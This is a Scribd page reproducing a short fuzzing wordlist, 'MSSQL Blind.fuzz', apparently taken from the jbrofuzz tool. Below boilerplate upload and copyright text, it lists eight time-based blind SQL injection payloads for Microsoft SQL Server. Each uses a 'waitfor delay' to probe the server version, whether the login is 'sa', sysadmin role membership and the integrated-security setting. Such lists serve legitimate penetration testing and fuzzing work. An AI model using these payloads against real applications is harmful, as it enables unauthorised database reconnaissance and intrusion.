Scribd
Upload
2 views

MSSQL Blind.fuzz

The document contains SQL injection statements attributed to jbrofuzz from April 13, 2010. These statements utilize conditional checks and delays to exploit vulnerabilities in a database system. The focus is on retrieving version information and user roles within the database.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2 views

MSSQL Blind.fuzz

The document contains SQL injection statements attributed to jbrofuzz from April 13, 2010. These statements utilize conditional checks and delays to exploit vulnerabilities in a database system. The focus is on retrieving version information and user roles within the database.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

# contains statements from jbrofuzz (13 April 2010)

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --


'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay
'0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay
'0:0:2' --

You might also like